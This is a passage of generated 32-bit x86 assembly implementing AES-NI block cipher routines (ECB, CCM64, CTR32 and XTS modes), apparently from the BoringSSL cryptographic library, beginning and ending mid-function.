db 102,15,56,220,225
L$009_aesni_encrypt6_inner:
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
L$_aesni_encrypt6_enter:
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
db 102,15,56,220,224
db 102,15,56,220,232
db 102,15,56,220,240
db 102,15,56,220,248
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$010enc6_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
db 102,15,56,221,208
db 102,15,56,221,216
db 102,15,56,221,224
db 102,15,56,221,232
db 102,15,56,221,240
db 102,15,56,221,248
ret
align 16
__aesni_decrypt6:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
db 102,15,56,222,209
pxor xmm5,xmm0
pxor xmm6,xmm0
db 102,15,56,222,217
lea edx,[32+ecx*1+edx]
neg ecx
db 102,15,56,222,225
pxor xmm7,xmm0
movups xmm0,[ecx*1+edx]
add ecx,16
jmp NEAR L$011_aesni_decrypt6_inner
align 16
L$012dec6_loop:
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
L$011_aesni_decrypt6_inner:
db 102,15,56,222,233
db 102,15,56,222,241
db 102,15,56,222,249
L$_aesni_decrypt6_enter:
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
db 102,15,56,222,224
db 102,15,56,222,232
db 102,15,56,222,240
db 102,15,56,222,248
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$012dec6_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,222,233
db 102,15,56,222,241
db 102,15,56,222,249
db 102,15,56,223,208
db 102,15,56,223,216
db 102,15,56,223,224
db 102,15,56,223,232
db 102,15,56,223,240
db 102,15,56,223,248
ret
global _aes_hw_ecb_encrypt
align 16
_aes_hw_ecb_encrypt:
L$_aes_hw_ecb_encrypt_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
and eax,-16
jz NEAR L$013ecb_ret
mov ecx,DWORD [240+edx]
test ebx,ebx
jz NEAR L$014ecb_decrypt
mov ebp,edx
mov ebx,ecx
cmp eax,96
jb NEAR L$015ecb_enc_tail
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
movdqu xmm5,[48+esi]
movdqu xmm6,[64+esi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
sub eax,96
jmp NEAR L$016ecb_enc_loop6_enter
align 16
L$017ecb_enc_loop6:
movups [edi],xmm2
movdqu xmm2,[esi]
movups [16+edi],xmm3
movdqu xmm3,[16+esi]
movups [32+edi],xmm4
movdqu xmm4,[32+esi]
movups [48+edi],xmm5
movdqu xmm5,[48+esi]
movups [64+edi],xmm6
movdqu xmm6,[64+esi]
movups [80+edi],xmm7
lea edi,[96+edi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
L$016ecb_enc_loop6_enter:
call __aesni_encrypt6
mov edx,ebp
mov ecx,ebx
sub eax,96
jnc NEAR L$017ecb_enc_loop6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
movups [80+edi],xmm7
lea edi,[96+edi]
add eax,96
jz NEAR L$013ecb_ret
L$015ecb_enc_tail:
movups xmm2,[esi]
cmp eax,32
jb NEAR L$018ecb_enc_one
movups xmm3,[16+esi]
je NEAR L$019ecb_enc_two
movups xmm4,[32+esi]
cmp eax,64
jb NEAR L$020ecb_enc_three
movups xmm5,[48+esi]
je NEAR L$021ecb_enc_four
movups xmm6,[64+esi]
xorps xmm7,xmm7
call __aesni_encrypt6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
jmp NEAR L$013ecb_ret
align 16
L$018ecb_enc_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$022enc1_loop_3:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$022enc1_loop_3
db 102,15,56,221,209
movups [edi],xmm2
jmp NEAR L$013ecb_ret
align 16
L$019ecb_enc_two:
call __aesni_encrypt2
movups [edi],xmm2
movups [16+edi],xmm3
jmp NEAR L$013ecb_ret
align 16
L$020ecb_enc_three:
call __aesni_encrypt3
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
jmp NEAR L$013ecb_ret
align 16
L$021ecb_enc_four:
call __aesni_encrypt4
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
jmp NEAR L$013ecb_ret
align 16
L$014ecb_decrypt:
mov ebp,edx
mov ebx,ecx
cmp eax,96
jb NEAR L$023ecb_dec_tail
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
movdqu xmm5,[48+esi]
movdqu xmm6,[64+esi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
sub eax,96
jmp NEAR L$024ecb_dec_loop6_enter
align 16
L$025ecb_dec_loop6:
movups [edi],xmm2
movdqu xmm2,[esi]
movups [16+edi],xmm3
movdqu xmm3,[16+esi]
movups [32+edi],xmm4
movdqu xmm4,[32+esi]
movups [48+edi],xmm5
movdqu xmm5,[48+esi]
movups [64+edi],xmm6
movdqu xmm6,[64+esi]
movups [80+edi],xmm7
lea edi,[96+edi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
L$024ecb_dec_loop6_enter:
call __aesni_decrypt6
mov edx,ebp
mov ecx,ebx
sub eax,96
jnc NEAR L$025ecb_dec_loop6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
movups [80+edi],xmm7
lea edi,[96+edi]
add eax,96
jz NEAR L$013ecb_ret
L$023ecb_dec_tail:
movups xmm2,[esi]
cmp eax,32
jb NEAR L$026ecb_dec_one
movups xmm3,[16+esi]
je NEAR L$027ecb_dec_two
movups xmm4,[32+esi]
cmp eax,64
jb NEAR L$028ecb_dec_three
movups xmm5,[48+esi]
je NEAR L$029ecb_dec_four
movups xmm6,[64+esi]
xorps xmm7,xmm7
call __aesni_decrypt6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
jmp NEAR L$013ecb_ret
align 16
L$026ecb_dec_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$030dec1_loop_4:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$030dec1_loop_4
db 102,15,56,223,209
movups [edi],xmm2
jmp NEAR L$013ecb_ret
align 16
L$027ecb_dec_two:
call __aesni_decrypt2
movups [edi],xmm2
movups [16+edi],xmm3
jmp NEAR L$013ecb_ret
align 16
L$028ecb_dec_three:
call __aesni_decrypt3
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
jmp NEAR L$013ecb_ret
align 16
L$029ecb_dec_four:
call __aesni_decrypt4
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
L$013ecb_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
pxor xmm7,xmm7
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_ccm64_encrypt_blocks
align 16
_aes_hw_ccm64_encrypt_blocks:
L$_aes_hw_ccm64_encrypt_blocks_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
mov ecx,DWORD [40+esp]
mov ebp,esp
sub esp,60
and esp,-16
mov DWORD [48+esp],ebp
movdqu xmm7,[ebx]
movdqu xmm3,[ecx]
mov ecx,DWORD [240+edx]
mov DWORD [esp],202182159
mov DWORD [4+esp],134810123
mov DWORD [8+esp],67438087
mov DWORD [12+esp],66051
mov ebx,1
xor ebp,ebp
mov DWORD [16+esp],ebx
mov DWORD [20+esp],ebp
mov DWORD [24+esp],ebp
mov DWORD [28+esp],ebp
shl ecx,4
mov ebx,16
lea ebp,[edx]
movdqa xmm5,[esp]
movdqa xmm2,xmm7
lea edx,[32+ecx*1+edx]
sub ebx,ecx
db 102,15,56,0,253
L$031ccm64_enc_outer:
movups xmm0,[ebp]
mov ecx,ebx
movups xmm6,[esi]
xorps xmm2,xmm0
movups xmm1,[16+ebp]
xorps xmm0,xmm6
xorps xmm3,xmm0
movups xmm0,[32+ebp]
L$032ccm64_enc2_loop:
db 102,15,56,220,209
db 102,15,56,220,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$032ccm64_enc2_loop
db 102,15,56,220,209
db 102,15,56,220,217
paddq xmm7,[16+esp]
dec eax
db 102,15,56,221,208
db 102,15,56,221,216
lea esi,[16+esi]
xorps xmm6,xmm2
movdqa xmm2,xmm7
movups [edi],xmm6
db 102,15,56,0,213
lea edi,[16+edi]
jnz NEAR L$031ccm64_enc_outer
mov esp,DWORD [48+esp]
mov edi,DWORD [40+esp]
movups [edi],xmm3
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
pxor xmm7,xmm7
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_ccm64_decrypt_blocks
align 16
_aes_hw_ccm64_decrypt_blocks:
L$_aes_hw_ccm64_decrypt_blocks_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
mov ecx,DWORD [40+esp]
mov ebp,esp
sub esp,60
and esp,-16
mov DWORD [48+esp],ebp
movdqu xmm7,[ebx]
movdqu xmm3,[ecx]
mov ecx,DWORD [240+edx]
mov DWORD [esp],202182159
mov DWORD [4+esp],134810123
mov DWORD [8+esp],67438087
mov DWORD [12+esp],66051
mov ebx,1
xor ebp,ebp
mov DWORD [16+esp],ebx
mov DWORD [20+esp],ebp
mov DWORD [24+esp],ebp
mov DWORD [28+esp],ebp
movdqa xmm5,[esp]
movdqa xmm2,xmm7
mov ebp,edx
mov ebx,ecx
db 102,15,56,0,253
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$033enc1_loop_5:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$033enc1_loop_5
db 102,15,56,221,209
shl ebx,4
mov ecx,16
movups xmm6,[esi]
paddq xmm7,[16+esp]
lea esi,[16+esi]
sub ecx,ebx
lea edx,[32+ebx*1+ebp]
mov ebx,ecx
jmp NEAR L$034ccm64_dec_outer
align 16
L$034ccm64_dec_outer:
xorps xmm6,xmm2
movdqa xmm2,xmm7
movups [edi],xmm6
lea edi,[16+edi]
db 102,15,56,0,213
sub eax,1
jz NEAR L$035ccm64_dec_break
movups xmm0,[ebp]
mov ecx,ebx
movups xmm1,[16+ebp]
xorps xmm6,xmm0
xorps xmm2,xmm0
xorps xmm3,xmm6
movups xmm0,[32+ebp]
L$036ccm64_dec2_loop:
db 102,15,56,220,209
db 102,15,56,220,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$036ccm64_dec2_loop
movups xmm6,[esi]
paddq xmm7,[16+esp]
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,221,208
db 102,15,56,221,216
lea esi,[16+esi]
jmp NEAR L$034ccm64_dec_outer
align 16
L$035ccm64_dec_break:
mov ecx,DWORD [240+ebp]
mov edx,ebp
movups xmm0,[edx]
movups xmm1,[16+edx]
xorps xmm6,xmm0
lea edx,[32+edx]
xorps xmm3,xmm6
L$037enc1_loop_6:
db 102,15,56,220,217
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$037enc1_loop_6
db 102,15,56,221,217
mov esp,DWORD [48+esp]
mov edi,DWORD [40+esp]
movups [edi],xmm3
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
pxor xmm7,xmm7
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_ctr32_encrypt_blocks
align 16
_aes_hw_ctr32_encrypt_blocks:
L$_aes_hw_ctr32_encrypt_blocks_begin:
push ebp
push ebx
push esi
push edi
%ifndef NDEBUG
push ebx
push edx
call L$038pic
L$038pic:
pop ebx
lea ebx,[(_BORINGSSL_function_hit+0-L$038pic)+ebx]
mov edx,1
mov BYTE [ebx],dl
pop edx
pop ebx
%endif
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
mov ebp,esp
sub esp,88
and esp,-16
mov DWORD [80+esp],ebp
cmp eax,1
je NEAR L$039ctr32_one_shortcut
movdqu xmm7,[ebx]
mov DWORD [esp],202182159
mov DWORD [4+esp],134810123
mov DWORD [8+esp],67438087
mov DWORD [12+esp],66051
mov ecx,6
xor ebp,ebp
mov DWORD [16+esp],ecx
mov DWORD [20+esp],ecx
mov DWORD [24+esp],ecx
mov DWORD [28+esp],ebp
db 102,15,58,22,251,3
db 102,15,58,34,253,3
mov ecx,DWORD [240+edx]
bswap ebx
pxor xmm0,xmm0
pxor xmm1,xmm1
movdqa xmm2,[esp]
db 102,15,58,34,195,0
lea ebp,[3+ebx]
db 102,15,58,34,205,0
inc ebx
db 102,15,58,34,195,1
inc ebp
db 102,15,58,34,205,1
inc ebx
db 102,15,58,34,195,2
inc ebp
db 102,15,58,34,205,2
movdqa [48+esp],xmm0
db 102,15,56,0,194
movdqu xmm6,[edx]
movdqa [64+esp],xmm1
db 102,15,56,0,202
pshufd xmm2,xmm0,192
pshufd xmm3,xmm0,128
cmp eax,6
jb NEAR L$040ctr32_tail
pxor xmm7,xmm6
shl ecx,4
mov ebx,16
movdqa [32+esp],xmm7
mov ebp,edx
sub ebx,ecx
lea edx,[32+ecx*1+edx]
sub eax,6
jmp NEAR L$041ctr32_loop6
align 16
L$041ctr32_loop6:
pshufd xmm4,xmm0,64
movdqa xmm0,[32+esp]
pshufd xmm5,xmm1,192
pxor xmm2,xmm0
pshufd xmm6,xmm1,128
pxor xmm3,xmm0
pshufd xmm7,xmm1,64
movups xmm1,[16+ebp]
pxor xmm4,xmm0
pxor xmm5,xmm0
db 102,15,56,220,209
pxor xmm6,xmm0
pxor xmm7,xmm0
db 102,15,56,220,217
movups xmm0,[32+ebp]
mov ecx,ebx
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
call L$_aesni_encrypt6_enter
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,xmm1
movups xmm1,[32+esi]
xorps xmm3,xmm0
movups [edi],xmm2
movdqa xmm0,[16+esp]
xorps xmm4,xmm1
movdqa xmm1,[64+esp]
movups [16+edi],xmm3
movups [32+edi],xmm4
paddd xmm1,xmm0
paddd xmm0,[48+esp]
movdqa xmm2,[esp]
movups xmm3,[48+esi]
movups xmm4,[64+esi]
xorps xmm5,xmm3
movups xmm3,[80+esi]
lea esi,[96+esi]
movdqa [48+esp],xmm0
db 102,15,56,0,194
xorps xmm6,xmm4
movups [48+edi],xmm5
xorps xmm7,xmm3
movdqa [64+esp],xmm1
db 102,15,56,0,202
movups [64+edi],xmm6
pshufd xmm2,xmm0,192
movups [80+edi],xmm7
lea edi,[96+edi]
pshufd xmm3,xmm0,128
sub eax,6
jnc NEAR L$041ctr32_loop6
add eax,6
jz NEAR L$042ctr32_ret
movdqu xmm7,[ebp]
mov edx,ebp
pxor xmm7,[32+esp]
mov ecx,DWORD [240+ebp]
L$040ctr32_tail:
por xmm2,xmm7
cmp eax,2
jb NEAR L$043ctr32_one
pshufd xmm4,xmm0,64
por xmm3,xmm7
je NEAR L$044ctr32_two
pshufd xmm5,xmm1,192
por xmm4,xmm7
cmp eax,4
jb NEAR L$045ctr32_three
pshufd xmm6,xmm1,128
por xmm5,xmm7
je NEAR L$046ctr32_four
por xmm6,xmm7
call __aesni_encrypt6
movups xmm1,[esi]
movups xmm0,[16+esi]
xorps xmm2,xmm1
movups xmm1,[32+esi]
xorps xmm3,xmm0
movups xmm0,[48+esi]
xorps xmm4,xmm1
movups xmm1,[64+esi]
xorps xmm5,xmm0
movups [edi],xmm2
xorps xmm6,xmm1
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
jmp NEAR L$042ctr32_ret
align 16
L$039ctr32_one_shortcut:
movups xmm2,[ebx]
mov ecx,DWORD [240+edx]
L$043ctr32_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$047enc1_loop_7:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$047enc1_loop_7
db 102,15,56,221,209
movups xmm6,[esi]
xorps xmm6,xmm2
movups [edi],xmm6
jmp NEAR L$042ctr32_ret
align 16
L$044ctr32_two:
call __aesni_encrypt2
movups xmm5,[esi]
movups xmm6,[16+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
movups [edi],xmm2
movups [16+edi],xmm3
jmp NEAR L$042ctr32_ret
align 16
L$045ctr32_three:
call __aesni_encrypt3
movups xmm5,[esi]
movups xmm6,[16+esi]
xorps xmm2,xmm5
movups xmm7,[32+esi]
xorps xmm3,xmm6
movups [edi],xmm2
xorps xmm4,xmm7
movups [16+edi],xmm3
movups [32+edi],xmm4
jmp NEAR L$042ctr32_ret
align 16
L$046ctr32_four:
call __aesni_encrypt4
movups xmm6,[esi]
movups xmm7,[16+esi]
movups xmm1,[32+esi]
xorps xmm2,xmm6
movups xmm0,[48+esi]
xorps xmm3,xmm7
movups [edi],xmm2
xorps xmm4,xmm1
movups [16+edi],xmm3
xorps xmm5,xmm0
movups [32+edi],xmm4
movups [48+edi],xmm5
L$042ctr32_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
movdqa [32+esp],xmm0
pxor xmm5,xmm5
movdqa [48+esp],xmm0
pxor xmm6,xmm6
movdqa [64+esp],xmm0
pxor xmm7,xmm7
mov esp,DWORD [80+esp]
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_xts_encrypt
align 16
_aes_hw_xts_encrypt:
L$_aes_hw_xts_encrypt_begin:
push ebp
push ebx
push esi
push edi
mov edx,DWORD [36+esp]
mov esi,DWORD [40+esp]
mov ecx,DWORD [240+edx]
movups xmm2,[esi]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$048enc1_loop_8:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$048enc1_loop_8
db 102,15,56,221,209
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebp,esp
sub esp,120
mov ecx,DWORD [240+edx]
and esp,-16
mov DWORD [96+esp],135
mov DWORD [100+esp],0
mov DWORD [104+esp],1
mov DWORD [108+esp],0
mov DWORD [112+esp],eax
mov DWORD [116+esp],ebp
movdqa xmm1,xmm2
pxor xmm0,xmm0
movdqa xmm3,[96+esp]
pcmpgtd xmm0,xmm1
and eax,-16
mov ebp,edx
mov ebx,ecx
sub eax,96
jc NEAR L$049xts_enc_short
shl ecx,4
mov ebx,16
sub ebx,ecx
lea edx,[32+ecx*1+edx]
jmp NEAR L$050xts_enc_loop6
align 16
L$050xts_enc_loop6:
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [16+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [32+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
pshufd xmm7,xmm0,19
movdqa [64+esp],xmm1
paddq xmm1,xmm1
movups xmm0,[ebp]
pand xmm7,xmm3
movups xmm2,[esi]
pxor xmm7,xmm1
mov ecx,ebx
movdqu xmm3,[16+esi]
xorps xmm2,xmm0
movdqu xmm4,[32+esi]
pxor xmm3,xmm0
movdqu xmm5,[48+esi]
pxor xmm4,xmm0
movdqu xmm6,[64+esi]
pxor xmm5,xmm0
movdqu xmm1,[80+esi]
pxor xmm6,xmm0
lea esi,[96+esi]
pxor xmm2,[esp]
movdqa [80+esp],xmm7
pxor xmm7,xmm1
movups xmm1,[16+ebp]
pxor xmm3,[16+esp]
pxor xmm4,[32+esp]
db 102,15,56,220,209
pxor xmm5,[48+esp]
pxor xmm6,[64+esp]
db 102,15,56,220,217
pxor xmm7,xmm0
movups xmm0,[32+ebp]
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
call L$_aesni_encrypt6_enter
movdqa xmm1,[80+esp]
pxor xmm0,xmm0
xorps xmm2,[esp]
pcmpgtd xmm0,xmm1
xorps xmm3,[16+esp]
movups [edi],xmm2
xorps xmm4,[32+esp]
movups [16+edi],xmm3
xorps xmm5,[48+esp]
movups [32+edi],xmm4
xorps xmm6,[64+esp]
movups [48+edi],xmm5
xorps xmm7,xmm1
movups [64+edi],xmm6
pshufd xmm2,xmm0,19
movups [80+edi],xmm7
lea edi,[96+edi]
movdqa xmm3,[96+esp]
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
sub eax,96
jnc NEAR L$050xts_enc_loop6
mov ecx,DWORD [240+ebp]
mov edx,ebp
mov ebx,ecx
L$049xts_enc_short:
add eax,96
jz NEAR L$051xts_enc_done6x
movdqa xmm5,xmm1
cmp eax,32
jb NEAR L$052xts_enc_one
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
je NEAR L$053xts_enc_two
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm6,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
cmp eax,64
jb NEAR L$054xts_enc_three
pshufd xmm2,xmm0,19
pxor xmm0,xmm0
movdqa xmm7,xmm1
paddq xmm1,xmm1
pand xmm2,xmm3
pcmpgtd xmm0,xmm1
pxor xmm1,xmm2
movdqa [esp],xmm5
movdqa [16+esp],xmm6
je NEAR L$055xts_enc_four
movdqa [32+esp],xmm7
pshufd xmm7,xmm0,19
movdqa [48+esp],xmm1
paddq xmm1,xmm1
pand xmm7,xmm3
pxor xmm7,xmm1
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
pxor xmm2,[esp]
movdqu xmm5,[48+esi]
pxor xmm3,[16+esp]
movdqu xmm6,[64+esi]
pxor xmm4,[32+esp]
lea esi,[80+esi]
pxor xmm5,[48+esp]
movdqa [64+esp],xmm7
pxor xmm6,xmm7
call __aesni_encrypt6
movaps xmm1,[64+esp]
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,[32+esp]
movups [edi],xmm2
xorps xmm5,[48+esp]
movups [16+edi],xmm3
xorps xmm6,xmm1
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
lea edi,[80+edi]
jmp NEAR L$056xts_enc_done
align 16
L$052xts_enc_one:
movups xmm2,[esi]
lea esi,[16+esi]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$057enc1_loop_9:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$057enc1_loop_9
db 102,15,56,221,209
xorps xmm2,xmm5
movups [edi],xmm2
lea edi,[16+edi]
movdqa xmm1,xmm5
jmp NEAR L$056xts_enc_done
align 16
L$053xts_enc_two:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
lea esi,[32+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
call __aesni_encrypt2
xorps xmm2,xmm5
xorps xmm3,xmm6
movups [edi],xmm2
movups [16+edi],xmm3
lea edi,[32+edi]
movdqa xmm1,xmm6
jmp NEAR L$056xts_enc_done
align 16
L$054xts_enc_three:
movaps xmm7,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
lea esi,[48+esi]
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
call __aesni_encrypt3
xorps xmm2,xmm5
xorps xmm3,xmm6
xorps xmm4,xmm7
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
lea edi,[48+edi]
movdqa xmm1,xmm7
jmp NEAR L$056xts_enc_done
align 16
L$055xts_enc_four:
movaps xmm6,xmm1
movups xmm2,[esi]
movups xmm3,[16+esi]
movups xmm4,[32+esi]
xorps xmm2,[esp]
movups xmm5,[48+esi]
lea esi,[64+esi]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
xorps xmm5,xmm6
call __aesni_encrypt4
xorps xmm2,[esp]
xorps xmm3,[16+esp]
xorps xmm4,xmm7
movups [edi],xmm2
xorps xmm5,xmm6
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
lea edi,[64+edi]
movdqa xmm1,xmm6
jmp NEAR L$056xts_enc_done
align 16
L$051xts_enc_done6x:
mov eax,DWORD [112+esp]
and eax,15
jz NEAR L$058xts_enc_ret
movdqa xmm5,xmm1
mov DWORD [112+esp],eax
jmp NEAR L$059xts_enc_steal
align 16
L$056xts_enc_done:
mov eax,DWORD [112+esp]
pxor xmm0,xmm0
and eax,15
jz NEAR L$058xts_enc_ret
pcmpgtd xmm0,xmm1
mov DWORD [112+esp],eax
pshufd xmm5,xmm0,19
paddq xmm1,xmm1
pand xmm5,[96+esp]
pxor xmm5,xmm1
L$059xts_enc_steal:
movzx ecx,BYTE [esi]
movzx edx,BYTE [edi-16]
lea esi,[1+esi]
mov BYTE [edi-16],cl
mov BYTE [edi],dl
lea edi,[1+edi]
sub eax,1
jnz NEAR L$059xts_enc_steal
sub edi,DWORD [112+esp]
mov edx,ebp
mov ecx,ebx
movups xmm2,[edi-16]
xorps xmm2,xmm5
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$060enc1_loop_10:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$060enc1_loop_10
db 102,15,56,221,209
xorps xmm2,xmm5
movups [edi-16],xmm2
L$058xts_enc_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
movdqa [esp],xmm0
pxor xmm3,xmm3
movdqa [16+esp],xmm0
pxor xmm4,xmm4
movdqa [32+esp],xmm0
pxor xmm5,xmm5
movdqa [48+esp],xmm0
pxor xmm6,xmm6
movdqa [64+esp],xmm0
pxor xmm7,xmm7
movdqa [80+esp],xmm0
mov esp,DWORD [116+esp]
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_xts_decrypt
align 16
_aes_hw_xts_decrypt:
L$_aes_hw_xts_decrypt_begin:
push ebp
push ebx
push esi
push edi
mov edx,DWORD [36+esp]
mov esi,DWORD [40+esp]
mov ecx,DWORD [240+edx]
movups xmm2,[esi]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$061enc1_loop_11:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$061enc1_loop_11
db 102,15,56,221,209
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebp,esp
sub esp,120
and esp,-16
xor ebx,ebx
test eax,15
setnz bl
shl ebx,4
sub eax,ebx
mov DWORD [96+esp],135
mov DWORD [100+esp],0
mov DWORD [104+esp],1
mov DWORD [108+esp],0
mov DWORD [112+esp],eax
mov DWORD [116+esp],ebp
mov ecx,DWORD [240+edx]
mov ebp,edx
mov ebx,ecx
movdqa xmm1,xmm2
pxor xmm0,xmm0
movdqa xmm3,[96+esp]
pcmpgtd xmm0,xmm1
and eax,-16
sub eax,96
